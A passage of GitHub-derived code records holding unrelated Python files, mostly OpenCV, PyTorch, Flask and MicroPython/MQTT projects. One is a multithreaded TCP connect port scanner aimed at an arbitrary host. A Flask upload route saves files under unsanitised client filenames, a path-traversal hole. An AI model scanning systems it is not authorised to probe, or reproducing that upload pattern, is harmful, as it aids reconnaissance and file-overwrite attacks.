picture of eye\n \"\"\"\n cv.circle(img, (location[0], location[1]), location[2], (135, 0, 40), 1)\n cv.circle(img, (location[0], location[1]), 1, (60, 190, 160), 1)\n\n\ndef find_circles(img, param2=130, min_size=0):\n while True:\n temp = cv.HoughCircles(img, cv.HOUGH_GRADIENT, 1,\n 10, minRadius=min_size, param1=300, param2=param2)\n if temp is not None:\n break\n param2 += -1\n return temp[0][0]\n\n\ndef fill_holes(img):\n \"\"\"Fill holes in binary image\"\"\"\n hight = img.shape[0]\n width = img.shape[1]\n\n im_flood = ~img.copy()\n\n mask = np.zeros((hight+2, width+2), np.uint8)\n cv.floodFill(im_flood, mask, (0, 0), 255)\n\n pic_final = im_flood & img\n\n return pic_final\n","repo_name":"SuroWka-Roch/eye_detection","sub_path":"circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17583059551","text":"# admin.routes\nfrom app import app\nfrom app import db\nfrom app.models import Slider,Categories\nimport os\nfrom admin.forms import CategoryForm\nfrom flask import render_template,request,redirect,url_for\n\n@app.route('/admin')\ndef admin_index():\n return render_template('admin/index.html')\n\n# slider routes\n\n@app.route('/admin/slider',methods = ['GET','POST'])\ndef admin_slider():\n slides = Slider.query.all()\n if request.method=='POST':\n file = request.files['s_photo']\n filename = file.filename\n file.save(os.path.join(app.config['UPLOAD_FOLDER'],filename))\n\n slide = Slider(\n s_title = request.form['s_title'],\n s_header = request.form['s_header'],\n s_url = request.form['s_url'],\n s_photo = filename\n )\n\n db.session.add(slide)\n db.session.commit()\n return redirect('/admin/slider')\n return render_template('admin/slider.html',slides = slides)\n\n@app.route('/admin/categories',methods=['GET','POST'])\ndef admin_categories():\n form = CategoryForm()\n categories = Categories.query.all()\n if request.method=='POST':\n category = Categories(\n cat_name=form.cat_name.data\n )\n db.session.add(category)\n db.session.commit()\n return redirect('/admin/categories')\n return render_template('admin/categories.html',form=form,categories = categories)","repo_name":"FikratMammadov/PragmatechFoundationProject","sub_path":"Python/FinalProject/admin/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26378471685","text":"import socket\nimport argparse\nimport threading\nfrom queue import Queue\n\n# Версия с использованием многопоточности и очередей, чтобы не сканировать один и тот же порт по несолько раз\n#\n# Парсим аргум��нты\n# Первым идёт имя хоста, потом порты с и до какого проверять\n# Если ограничение до какого проверять не передано, то будет проверен только начальный порт\nparser = argparse.ArgumentParser('TCP port scanner')\nparser.add_argument('hostname', help='enter hostname')\nparser.add_argument('start_port', help='port to start from')\nparser.add_argument('end_port', help='last port to check')\n\narguments = parser.parse_args()\nhostname = arguments.hostname\nstart_port = int(arguments.start_port)\nend_port = int(arguments.end_port)\n\n# Получаем ip адрес хоста\nip = socket.gethostbyname(hostname)\n# Создадим очередь, куда положим номера портов для проверки\nqueue = Queue()\n# И список куда будем складывать открытые порты\nopen_ports = []\n\n# Функция которая сканирует переданный порт, если удалось подключиться, то успех\ndef scan_port(port):\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Создаем сокет\n sock.connect((ip, port)) # Пытаемся подключиться\n return True\n except:\n return False\n\n\n# Метод который положит выбранные порты в очередь\ndef ports_to_queue(start, end):\n for p in range(start, end + 1):\n queue.put(p)\n\n\n# Пишем метод, с помощью которого поток будет выполнять необходимую функцию\ndef worker():\n # Пока очередь не пуста берём из неё порт\n while not queue.empty():\n port = queue.get()\n if scan_port(port):\n open_ports.append(port)\n\n\n# Заполним очередь\nports_to_queue(start_port, end_port)\n\n# Создадим список потоков\nthread_list = []\n\n# Создадим потоки\nfor t in range(500):\n thread = threading.Thread(target=worker)\n thread_list.append(thread)\n\n# Запускаем потоки работать\nfor t in thread_list:\n t.start()\n\n# Ждём завершения работы всех потоков из списка\nfor t in thread_list:\n t.join()\n\n# Выводим информацию об открытых портах\nfor i in sorted(open_ports):\n print(f'Порт {i} открыт')\n\n# Запишем её в файл\nwith open('result.txt', 'w') as res:\n res.write(f'У хоста {hostname} открыты следующие порты: ' + str(sorted(open_ports))[1:-1])\n","repo_name":"Gleb1nho/TCP_scanner","sub_path":"multithreading_tcp_scanner.py","file_name":"multithreading_tcp_scanner.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22414229453","text":"import os\n\nimport cv2\nimport imutils\nimport numpy as np\n\n\ndef FindElement(imgGray, img):\n # Перебор блоков из папки\n ###\n images = []\n folder = os.path.dirname(os.path.realpath(__file__)) + '\\Templates'\n for filename in os.listdir(folder):\n img_dir = os.path.join(folder, filename)\n if img_dir is not None:\n images.append(img_dir)\n ###\n\n Arr_of_blocks = []\n #Цикл обработки и записи координат блоков\n for i in images:\n template = cv2.imread(i, 1)\n template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n template = cv2.Canny(template, 50, 200)\n w, h = template.shape[::-1]\n found = None\n #Если не удалось найти с первого раза блок, то сжимается изображение и снова идет поиск\n for scale in np.linspace(0.2, 1.0, 20)[::-1]:\n resized = imutils.resize(img, width=int(img.shape[1]*scale))\n r = img.shape[1] / float(resized.shape[1])\n if resized.shape[0] < h or resized.shape[1] < w:\n break\n edg = cv2.Canny(resized, 50, 200)\n res = cv2.matchTemplate(edg, template, cv2.TM_CCOEFF_NORMED)\n (_, maxVal, _, maxLoc) = cv2.minMaxLoc(res)\n if found is None or maxVal > found[0]:\n found = (maxVal, maxLoc, r)\n (_, maxLoc, r) = found\n (SX, SY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n (EX, EY) = (int((maxLoc[0]+w)*r), int((maxLoc[1]+h)*r))\n cv2.rectangle(img, (SX, SY), (EX, EY), (255, 0, 255), 1)\n cv2.putText(img, SX.__str__() + ' ' + SY.__str__() + ' ' + EX.__str__() + ' ' + EY.__str__(), (SX, SY), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0), lineType=cv2.LINE_AA)\n Arr = [SX, SY, EX, EY, i]\n Arr_of_blocks.append(Arr)\n print(Arr_of_blocks)\n return Arr_of_blocks\n","repo_name":"SkVoReC9/Diplom","sub_path":"FindFunc.py","file_name":"FindFunc.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71400492589","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\n\nimport torch.nn as nn\nfrom Model.noise_decompositon_Net import Noise_Decomposition_Net\nfrom Model.non_rigid_alignment_Net import Non_Rigid_Alignment_Net\nfrom Model.sparse_complement_Net import Sparse_Complement_Net\n\n\nclass LowRankNet(nn.Module):\n def __init__(self, n_channels, n_classes, num_ch=16, bilinear=True):\n super(LowRankNet, self).__init__()\n self.n_channels = n_channels\n self.n_classes = n_classes\n self.bilinear = bilinear\n \n self.Noise_Decomposition_Net = Noise_Decomposition_Net(n_channels, n_classes, num_ch)\n self.Non_Rigid_Alignment_Net = Non_Rigid_Alignment_Net(n_channels, 2, num_ch)\n self.Sparse_Complement_Net = Sparse_Complement_Net(n_channels, n_classes, num_ch)\n\n def forward(self, input):\n '''\n Args:\n input (Batch, Channel, Height, Width)\n Return:\n A (torch.): Denoised input imgs, \n Aτ: Aligned A,\n τ: Flow \n S: Sparse complement of Aτ\n '''\n\n A = self.Noise_Decomposition_Net(input)\n Aτ, τ = self.Non_Rigid_Alignment_Net(A)\n S = self.Sparse_Complement_Net(Aτ)\n return A, Aτ, τ, S\n","repo_name":"asanomitakanori/Unsupervised-Deep-Non-Rigid-Alignment-by-Low-Rank-Loss-and-Multi-Input-Attention","sub_path":"Model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4128373362","text":"import cairosvg\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\nboard = 'ZoeaT'\nboard = 'ZoeaB'\nboard = 'HermitT'\n# board = 'HermitB'\nlayer = 'Edge_Cuts'\nroot = '/Users/akihiro/repos/Hermit/{}/'.format( board )\npath_svg = root + 'layer/{}-{}.svg'.format( board, layer )\npath_png = root + 'svg.png'\npath_txt = root + 'Edge_Fill.txt'\npath_dist = root + 'dist.png'\ncairosvg.svg2png( url = path_svg, write_to = path_png, dpi = 254 )\nif True:\n png = Image.open( path_png )\n cairosvg.svg2png( url = path_svg, write_to = path_png, dpi = 254,\n output_width = png.size[0] + 2, output_height = png.size[1] + 2 )\n\npng = Image.open( path_png )\nprint( f'png size = {png.size}' )\n# voi: x width\nix0 = png.size[0]\nix1 = 0\nfor ix in range( png.size[0] ):\n for iy in range( 0, png.size[1], 5 ):\n _, _, _, a = png.getpixel( (ix, iy) )\n a = 255 if a >= 128 else 0\n if a == 255:\n ix0 = min( ix0, ix )\n ix1 = max( ix1, ix )\n break\n# ix0 -= 1\n# ix1 += 1\nw = ix1 - ix0 + 1\nprint( \"ix = ({}, {}), width = {}\".format( ix0, ix1, w ) )\n\n# voi: y height\niy0 = png.size[1]\niy1 = 0\nfor iy in range( png.size[1] ):\n for ix in range( 0, png.size[0], 5 ):\n _, _, _, a = png.getpixel( (ix, iy) )\n a = 255 if a >= 128 else 0\n if a == 255:\n iy0 = min( iy0, iy )\n iy1 = max( iy1, iy )\n break\n# iy0 -= 1\n# iy1 += 1\nh = iy1 - iy0 + 1\nprint( \"iy = ({}, {}), height = {}\".format( iy0, iy1, h ) )\n\nmask = np.zeros( (h, w), np.uint8 )\nfor y in range( h ):\n iy = y + iy0\n for x in range( w ):\n ix = x + ix0\n if 0 <= ix and ix < png.size[0] and 0 <= iy and iy < png.size[1]:\n _, _, _, a = png.getpixel( (ix, iy) )\n else:\n a = 0\n v = 0 if a >= 64 else 255\n mask[y, x] = v\n\nif False:\n retval, labels = cv2.connectedComponents( mask )\n label = labels[h >> 1, w >> 1]\n print( f'#labels = {retval}, label = {label}' )\nelse:\n retval, labels, stats, centroids = cv2.connectedComponentsWithStats( mask )\n total_area = w * h\n max_area = -1\n for idx, (x, y, _, _, area) in enumerate( stats ):\n if area > total_area / 8:\n print( f'idx = {idx}, area = {area} total = {total_area}' )\n if max_area < area:\n max_area = area\n label = idx\n print( f'#labels = {retval}, label = {label}, max_area = {max_area}' )\n#fill_mask = np.zeros( (h + 2, w + 2), np.uint8 )\n#cv2.floodFill( mask, fill_mask, (h >> 1, w >> 1), 255, 0, 128, 4 | cv2.FLOODFILL_FIXED_RANGE )\n\nmask1 = np.zeros( (h, w), np.uint8 )\nmask2 = np.zeros( (h, w), np.uint8 )\nfor y in range( h ):\n for x in range( w ):\n inside = (labels[y, x] == label)\n mask1[y, x] = 255 if inside else 0\n mask2[y, x] = 0 if inside else 255\nprint( 'done largest label mask' )\n\ndist1 = cv2.distanceTransform( mask1, cv2.DIST_L2, cv2.DIST_MASK_PRECISE )\ndist2 = cv2.distanceTransform( mask2, cv2.DIST_L2, cv2.DIST_MASK_PRECISE )\ndist1 = cv2.GaussianBlur( dist1, ksize = (7, 7), sigmaX = 0.7 )\ndist2 = cv2.GaussianBlur( dist2, ksize = (7, 7), sigmaX = 0.7 )\nprint( 'done distance transform' )\n\n# dist = Image.new( 'RGB', (w, h) )\ndist = np.empty((h, w, 3), np.uint8)\nfor y in range( h ):\n for x in range( w ):\n inside = True if mask1[y, x] != 0 else False\n val = dist1[y, x] if inside else dist2[y, x]\n val = int( round( val * 3 ) )\n val = min( max( val, 0), 255 )\n r = 255 if inside else 0\n b = 0 if inside else 255\n g = val\n # dist.putpixel( (x, y), (r, g, b))\n dist[y, x, 0] = r\n dist[y, x, 1] = g\n dist[y, x, 2] = b\ndist = Image.fromarray( dist )\ndist.save( path_dist )\nprint( f'saved {path_dist}' )\n\n# dump to text file\nwith open( path_txt, 'w' ) as fout:\n fout.write( '{}\\n'.format( w ) )\n fout.write( '{}\\n'.format( h ) )\n for y in range( h ):\n line = ''\n for x in range( w ):\n inside = True if mask1[y, x] != 0 else False\n val = dist1[y, x] if inside else -dist2[y, x]\n line += '{:.0f},'.format( val * 10 )\n fout.write( line + '\\n' )\nprint( f'saved {path_txt}' )\n","repo_name":"orihikarna/Hermit","sub_path":"python/svg2png.py","file_name":"svg2png.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"72739044262","text":"from datetime import date\r\nTODAY = str(date.today())\r\n\r\ndef my_copyright4(name, email, date=TODAY):\r\n line1 = \"*** programmed by \"+name+ \" for MSDM5002 ***\"\r\n length = len(line1)\r\n line3 = 'date: '+ date\r\n text_length = length - 10 \r\n \r\n if (length - (len(line3)+6)) % 2 == 1:\r\n space_gap1 = (length - (len(line3)+6)) // 2\r\n space_gap2 = (length - (len(line3)+6)) // 2 + 1\r\n else:\r\n space_gap1 = (length - (len(line3)+6)) // 2\r\n space_gap2 = (length - (len(line3)+6)) // 2\r\n \r\n line4 = '***' + '-' * (length - 6) + '***'\r\n \r\n text = 'You can use it as you like, but there might be many bugs. If you\\\r\n find some bugs, please send them to \"'+email+'\"\"'\r\n word_list = text.split(' ')\r\n \r\n print(\"*\" * length)\r\n print(line1)\r\n print('***'+' '*space_gap1+line3+' '*space_gap2+'***') #center!\r\n print(line4)\r\n\r\n while word_list :\r\n i = 0 \r\n current_length = 0\r\n while(current_length <= text_length):\r\n i += 1\r\n current_length = 0\r\n \r\n for j in range(i):\r\n if j < len(word_list): \r\n if j == 0: \r\n current_length += (len(word_list[j]))\r\n else:\r\n current_length += (len(word_list[j])+1)\r\n else:\r\n current_length = text_length + 1\r\n break\r\n \r\n line11 =''\r\n for j in range(i-1):\r\n if j == 0:\r\n line11 += (word_list[j])\r\n else:\r\n line11 += (' '+word_list[j])\r\n \r\n \r\n del word_list[0:i-1]\r\n \r\n if len(word_list) == 1: #the situation that email it too long\r\n remaining = word_list[0][(text_length-len(line11)-1):len(word_list[0])-1]\r\n line11 += ' '+word_list[0][0:(text_length-len(line11)-1)]\r\n print('*** '+line11+' ***')\r\n \r\n if len(remaining) <= text_length:\r\n print('*** '+remaining+' '*(text_length-len(remaining))+' ***')\r\n del word_list[0]\r\n else:\r\n while(len(remaining) > text_length):\r\n print('*** '+remaining[0:text_length]+' ***')\r\n remaining = remaining[text_length:]\r\n if len(remaining) <= text_length:\r\n print('*** '+remaining+' '*(text_length-len(remaining))+' ***')\r\n print(\"*\" * length)\r\n return #that is the end!\r\n \r\n else:\r\n line11 += ' '*(text_length-len(line11))\r\n print('*** '+line11+' ***')\r\n \r\n #ending-------------------------------- \r\n print(\"*\" * length)\r\n \r\n return","repo_name":"Grain-6/Auto-copyright-statements","sub_path":"my_copyright4.py","file_name":"my_copyright4.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36586593960","text":"from old import utils_envmap\nimport numpy as np\nfrom PIL import Image\nimport math\nfrom pathlib import Path\nfrom skylibs.envmap import EnvironmentMap\nimport matplotlib.pyplot as plt\nimport cv2\n\nnp.set_printoptions(formatter={'float': '{: 0.5f}'.format})\n\n\ndef plot_image(img):\n plt.imshow(img)\n plt.show()\n\n\nwidth_resolution = 2048\nnumber_of_cameras = 3\ncameras_to_keep = 2\ncameras_to_keep_range = tuple(range(1, cameras_to_keep + 1))\n# envmap_type = 'latlong'\nenvmap_type = 'cube'\n\nin_path = 'images/' + str(width_resolution) + \"/\" + str(number_of_cameras) + '/360render_'\nout_path = \"out/envmap/\" + envmap_type + '/' + str(width_resolution) + \"/\" + str(number_of_cameras) + \"/keep_\" + str(\n cameras_to_keep_range[-1]) + \"/\"\nout_path_flow = out_path + 'optical_flow'\nPath(out_path_flow).mkdir(parents=True, exist_ok=True)\n\ncamera_angles = []\n\nenv_map_panos = []\npanos_opencv = []\n\nfor i in range(number_of_cameras):\n e = EnvironmentMap(in_path + str(i) + '.jpg', 'latlong')\n if envmap_type == 'cube':\n e = e.convertTo('cube')\n env_map_panos.append(e)\n\n img = cv2.cvtColor((e.data * 255).astype(np.uint8), cv2.COLOR_RGB2BGR)\n\n cv2.imwrite(out_path + \"original_\" + str(i) + '.jpg', img)\n\n panos_opencv.append(img)\n\n angle = (1 + 2 * i) * math.pi / number_of_cameras + math.pi / 2\n camera_angles.append(angle)\n\nheight, width, channels = env_map_panos[0].data.shape\n\n# optical_flows = optical_flow.calculate_optical_flows_between_panoramas(panos_opencv, out_path)\n\nrho_range = np.linspace(0.5, 5, 10)\n# rho_range = [3.0]\n\nfor rho in rho_range:\n print(\"\\nStarting rho =\", rho)\n pano_side_list = ['_left_eye.jpg', '_right_eye.jpg']\n\n camera_points = utils_envmap.create_all_camera_points(camera_angles)\n\n x, y, z, valid = env_map_panos[0].worldCoordinates()\n\n projection_points = utils_envmap.create_all_projection_points(rho, x, y, z)\n\n eye_points = utils_envmap.create_all_eyes_points(projection_points)\n\n camera_vectors_cartesian_coordinates, camera_vectors_spherical_coordinates = utils_envmap.create_all_cameras_vectors(\n projection_points, camera_angles)\n\n\n new_pano_list = []\n min_angles_index_list = []\n min_angles_ratio_list = []\n best_cameras_vectors_cartesian_list = []\n\n for new_pano_index in range(2):\n new_pano_list.append(np.zeros((height, width, channels)).reshape((-1, 3)))\n\n eye_vectors = utils_envmap.create_eye_vectors(projection_points, eye_points[new_pano_index])\n\n angles = []\n\n for camera_vectors in camera_vectors_cartesian_coordinates:\n angles.append(utils_envmap.calculate_angles_between_vectors(eye_vectors, camera_vectors))\n\n angles = np.transpose(np.array(angles))\n\n min_angles, min_angles_index = utils_envmap.calculate_minimum_angles_and_indexes(angles, cameras_to_keep_range)\n\n min_angles_ratio = utils_envmap.calculate_angles_ratio(min_angles)\n\n intermediate_points = utils_envmap.calculate_intermediate_points(camera_points, min_angles_ratio, min_angles_index)\n\n min_angles_index_list.append(min_angles_index)\n\n min_angles_ratio_list.append(min_angles_ratio)\n\n best_camera_vectors_cartesian_coordinates = camera_vectors_cartesian_coordinates[\n min_angles_index,\n np.arange(camera_vectors_cartesian_coordinates.shape[1])[:, None],\n :\n ]\n\n best_cameras_vectors_cartesian_list.append(best_camera_vectors_cartesian_coordinates)\n\n for pano_side, new_pano, min_angles_index, best_camera_vectors_cartesian_coordinates in zip(pano_side_list,\n new_pano_list,\n min_angles_index_list,\n best_cameras_vectors_cartesian_list):\n for i in range(len(env_map_panos)):\n for j in range(cameras_to_keep):\n index = np.argwhere(min_angles_index[:, j] == i)\n\n xyz = np.squeeze(best_camera_vectors_cartesian_coordinates[index, j, :])\n\n u, v = env_map_panos[i].world2image(xyz[:, 0], xyz[:, 1], xyz[:, 2])\n\n u = (u * width).astype(np.int)\n v = (v * height).astype(np.int)\n\n u = np.where(u >= width, width - 1, u)\n v = np.where(v >= height, height - 1, v)\n\n new_pano[index, :] += env_map_panos[i].data[v, u, :][:, None]\n\n new_pano = (new_pano.reshape(height, width, channels) * 255 / cameras_to_keep).astype(np.uint8)\n\n if envmap_type == 'cube':\n eye_pano_cube = Image.fromarray(new_pano)\n save_path = out_path + \"cubemap_rho_\" + str(rho) + pano_side\n eye_pano_cube.save(save_path)\n print(\"Saved cubemap representation in :\", save_path)\n\n eye_pano_latlong = EnvironmentMap(new_pano, 'cube')\n eye_pano_latlong = eye_pano_latlong.convertTo('latlong')\n eye_pano_latlong = Image.fromarray(eye_pano_latlong.data.astype(np.uint8))\n save_path = out_path + \"rho_\" + str(rho) + pano_side\n eye_pano_latlong.save(save_path)\n else:\n eye_pano_latlong = Image.fromarray(new_pano)\n save_path = out_path + \"rho_\" + str(rho) + pano_side\n eye_pano_latlong.save(save_path)\n\n print(\"Saved latlong representation in :\", save_path)\n","repo_name":"LucaBlanchout/panorama_generation","sub_path":"old/old_env_map_main.py","file_name":"old_env_map_main.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28581578983","text":"#import machine\r\nfrom machine import RTC\r\nimport time\r\nfrom time import sleep\r\nimport os\r\nimport ujson\r\nfrom umqtt.simple import MQTTClient\r\n################# main for light ########################\r\ndef savestate():\r\n global status, BUSY\r\n statusfile = open('status', 'w')\r\n myjson = ujson.dumps(status)\r\n statusfile.write(str(myjson))\r\n statusfile.close()\r\n print(\"saved\" + str(status))\r\n \r\ndef received(topic, inmsg):\r\n global status, BUSY, ROOT_TOPIC\r\n if not BUSY and topic != ROOT_TOPIC + b'white/state' and topic != ROOT_TOPIC + b'rgb/state':\r\n BUSY = True\r\n #print(topic, inmsg)\r\n msg = inmsg.decode('utf-8')\r\n print(msg)\r\n ##############WHITE######################\r\n if topic == ROOT_TOPIC + b'white/switch':\r\n print('ESP received switch')\r\n \r\n newset = ujson.loads(msg)\r\n print(newset)\r\n status['white']['state'] = newset.get('state', status['white']['state'])\r\n status['white']['brightness'] = newset.get('brightness', status['white']['brightness'])\r\n if status['white']['state'] == 'ON':\r\n WHITE_PIN.duty(status['white']['brightness'])\r\n else:\r\n WHITE_PIN.duty(0)\r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n savestate()\r\n ########################rgb#######################\r\n if topic == ROOT_TOPIC + b'version?':\r\n print('ESP version request')\r\n client.publish(ROOT_TOPIC + b'version', 'Version 2021.091')\r\n if topic == ROOT_TOPIC + b'rgb/switch':\r\n print('RGB received switch')\r\n newset = ujson.loads(msg)\r\n print(newset)\r\n status['rgb']['state'] = newset.get('state', status['rgb']['state'])\r\n status['rgb']['brightness'] = newset.get('brightness', status['rgb']['brightness'])\r\n status['rgb']['color'] = newset.get('color', status['rgb']['color'])\r\n if status['rgb']['state'] == 'ON':\r\n BRIGHTMULTIPLIER = float(status['rgb']['brightness'] / 1024)\r\n red = int(float(status['rgb']['color']['r'] /255) *1024)\r\n red = int(red * BRIGHTMULTIPLIER )\r\n green = int(float(status['rgb']['color']['g'] /255) * 1024)\r\n green = int(green * BRIGHTMULTIPLIER)\r\n blue = int(float(status['rgb']['color']['b'] /255) * 1025)\r\n blue = int(blue * BRIGHTMULTIPLIER)\r\n print(\"red is:\" + str(red))\r\n print(\"green is:\" + str(green))\r\n print(\"blue is:\" + str(blue))\r\n RED_PIN.duty(int(red))\r\n GREEN_PIN.duty(int(green))\r\n BLUE_PIN.duty(int(blue))\r\n else:\r\n RED_PIN.duty(0)\r\n GREEN_PIN.duty(0)\r\n BLUE_PIN.duty(0)\r\n client.publish(ROOT_TOPIC + b'rgb/state', str(ujson.dumps(status['rgb'])))\r\n savestate()\r\n BUSY = False\r\n else:\r\n print('.', end='')\r\n\r\ndef connect_and_subscribe():\r\n global CLIENT_ID, BROKER_ADDRESS, ROOT_TOPIC, client, SWITCH_PIN\r\n try:\r\n SWITCH_PIN.value(0)\r\n client = MQTTClient(CLIENT_ID, BROKER_ADDRESS)\r\n client.set_callback(received)\r\n client.connect()\r\n time.sleep(2)\r\n print(\"connecting\")\r\n client.subscribe(ROOT_TOPIC + b'#')\r\n print('Connected to %s MQTT broker, subscribed to %s topic' % (BROKER_ADDRESS, ROOT_TOPIC))\r\n SWITCH_PIN.value(1)\r\n client.publish(ROOT_TOPIC + b'version', 'Version 2021.091')\r\n return client\r\n except:\r\n SWITCH_PIN.value(1)\r\n time.sleep(1)\r\n SWITCH_PIN.value(0)\r\n time.sleep(1)\r\n SWITCH_PIN.value(1)\r\n time.sleep(1)\r\n SWITCH_PIN.value(0)\r\n time.sleep(1)\r\n SWITCH_PIN.value(1)\r\n time.sleep(1)\r\n SWITCH_PIN.value(0)\r\n return None\r\n\r\n################# main for light ########################\r\nprint(\"Loading.............\")\r\nclient = connect_and_subscribe()\r\nsleep(2)\r\nlast_message = 0\r\nmessage_interval = 30\r\ntime_interval = 3600\r\n#wdt.feed()\r\nlastin = 1\r\ncounting = False\r\nsw1count = 0\r\nsavtime = ''\r\n#wdt.feed()\r\n#print(dir(client.ping))\r\nshort_time = 5\r\ndown_time = 50\r\n\r\nctrlw_down = 0\r\nctrlw_raise = False\r\nctrlw_short = 0\r\nctrlw_level = 0\r\n\r\nctrlm_down = 0\r\nctrlm_raise = False\r\nctrlm_short = 0\r\nctrlm_level = 0\r\nwhile 1:\r\n try:\r\n try:\r\n client.check_msg()\r\n except:\r\n print(\"error checking\")\r\n client = connect_and_subscribe()\r\n#######################start white contro\r\n if CTRL_WHITE.value() == 0:\r\n #print(\".\", end='')\r\n if ctrlw_short > 0:\r\n print(\"XX\", end='')\r\n ctrlw_short += 1\r\n if ctrlw_short > short_time:\r\n ctrlw_short = 0\r\n print(str(status['white']['state']) == 'OFF')\r\n #######Toggle state##########\r\n if str(status['white']['state']) == 'OFF':\r\n WHITE_PIN.duty(status['white']['brightness'])\r\n status['white']['state'] = 'ON'\r\n else:\r\n WHITE_PIN.duty(0)\r\n status['white']['state'] = 'OFF' \r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n savestate()\r\n if CTRL_WHITE.value() == 1:\r\n print(\"after short2\" + str(ctrlw_short))\r\n print(\"||||||\", end='')\r\n ctrlw_down = 0\r\n ctrlw_level = int(status['white']['brightness'])\r\n if ctrlw_short > 1:\r\n ctrlw_raise = True\r\n else:\r\n ctrlw_dimming = True\r\n print(ctrlw_level)\r\n while CTRL_WHITE.value() == 1:\r\n ctrlw_down += 1\r\n if ctrlw_down > down_time:\r\n WHITE_PIN.duty(ctrlw_level)\r\n if ctrlw_level < 1:\r\n ctrlw_raise = True\r\n if ctrlw_raise == True:\r\n ctrlw_level = int(ctrlw_level) + 1\r\n if int(ctrlw_level) > 1024:\r\n print(\"Stop Bright\")\r\n #ctrlw_dimming = True\r\n ctrlw_raise = False\r\n ctrlw_short = 0\r\n else:\r\n ctrlw_raise = True\r\n else:\r\n ctrlw_level -= 1\r\n if ctrlw_level < 1:\r\n ctrlw_raise = True\r\n sleep(.01)\r\n if ctrlw_down > down_time:\r\n ctrlw_short = 0\r\n ctrlw_down = 0\r\n else:\r\n ctrlw_short = 1\r\n ctrlw_raise = False\r\n ctrlw_dimming = False\r\n status['white']['brightness'] = ctrlw_level\r\n if ctrlw_down == 0: \r\n client.publish(ROOT_TOPIC + b'white/state', str(ujson.dumps(status['white'])))\r\n savestate()\r\n ctrlw_raise = False\r\n ctrlw_dimming = False\r\n print(\"after short1\" + str(ctrlw_short))\r\n#######################logic#################################\r\n if CTRL_MOOD.value() == 0:\r\n #print(\".\", end='')\r\n if ctrlm_short > 0:\r\n print(\"XX\", end='')\r\n ctrlm_short += 1\r\n if ctrlm_short > short_time:\r\n ctrlm_short = 0\r\n print(str(status['rgb']['state']) == 'OFF')\r\n #######Toggle state##########\r\n if str(status['rgb']['state']) == 'OFF':\r\n #WHITE_PIN.duty(status['rgb']['brightness'])\r\n status['rgb']['state'] = 'ON'\r\n BRIGHTMULTIPLIER = float(status['rgb']['brightness'] / 1024)\r\n red = int(float(status['rgb']['color']['r'] /255) *1024)\r\n red = int(red * BRIGHTMULTIPLIER )\r\n green = int(float(status['rgb']['color']['g'] /255) * 1024)\r\n green = int(green * BRIGHTMULTIPLIER)\r\n blue = int(float(status['rgb']['color']['b'] /255) * 1025)\r\n blue = int(blue * BRIGHTMULTIPLIER)\r\n print(\"red is:\" + str(red))\r\n print(\"green is:\" + str(green))\r\n print(\"blue is:\" + str(blue))\r\n RED_PIN.duty(int(red))\r\n GREEN_PIN.duty(int(green))\r\n BLUE_PIN.duty(int(blue))\r\n else:\r\n RED_PIN.duty(0)\r\n GREEN_PIN.duty(0)\r\n BLUE_PIN.duty(0)\r\n status['rgb']['state'] = 'OFF'\r\n client.publish(ROOT_TOPIC + b'rgb/state', str(ujson.dumps(status['rgb'])))\r\n savestate()\r\n if CTRL_MOOD.value() == 1:\r\n print(\"||||||\", end='')\r\n ctrlm_down = 0\r\n ctrlm_level = int(status['rgb']['brightness'])\r\n if ctrlm_short < 1:\r\n ctrlm_raise = True\r\n else:\r\n ctrlm_raise = False\r\n while CTRL_MOOD.value() == 1:\r\n ctrlm_down += 1\r\n if ctrlm_down > down_time:\r\n status['rgb']['brightness'] = ctrlm_level\r\n BRIGHTMULTIPLIER = float(status['rgb']['brightness'] / 1024)\r\n red = int(float(status['rgb']['color']['r'] /255) *1024)\r\n red = int(red * BRIGHTMULTIPLIER )\r\n green = int(float(status['rgb']['color']['g'] /255) * 1024)\r\n green = int(green * BRIGHTMULTIPLIER)\r\n blue = int(float(status['rgb']['color']['b'] /255) * 1025)\r\n blue = int(blue * BRIGHTMULTIPLIER)\r\n print(\"red is:\" + str(red))\r\n print(\"green is:\" + str(green))\r\n print(\"blue is:\" + str(blue))\r\n RED_PIN.duty(int(red))\r\n GREEN_PIN.duty(int(green))\r\n BLUE_PIN.duty(int(blue))\r\n if ctrlm_level < 1:\r\n ctrlm_raise = True\r\n if ctrlm_raise == True:\r\n ctrlm_level += 1\r\n if int(ctrlm_level) > 1024:\r\n ctrlm_raise = False\r\n else:\r\n ctrlm_raise = True\r\n else:\r\n ctrlm_level -= 1\r\n if ctrlm_level < 1:\r\n ctrlm_raise = True\r\n print(str(ctrlm_level) + \"--\" + str(int(red)))\r\n sleep(.01)\r\n if ctrlm_down > down_time:\r\n ctrlm_short = 0\r\n ctrlm_down = 0\r\n else:\r\n ctrlm_short = 1\r\n ctrlm_raise = False\r\n status['rgb']['brightness'] = ctrlm_level\r\n if ctrlm_down == 0: \r\n client.publish(ROOT_TOPIC + b'rgb/state', 